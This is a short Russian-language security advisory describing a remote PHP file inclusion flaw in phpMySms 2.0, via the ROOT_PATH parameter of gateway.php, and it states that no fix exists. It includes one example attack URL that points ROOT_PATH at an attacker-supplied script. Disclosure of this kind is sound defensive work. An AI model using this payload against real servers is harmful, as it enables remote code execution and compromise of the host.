PHP-инклюдинг в phpMySms

Дата публикации:
03.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
1653
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpMySms 2.x
Уязвимые версии: phpMySms 2.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "ROOT_PATH" в сценарии gateway.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]

URL производителя: www.phpmysms.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability

или введите имя

CAPTCHA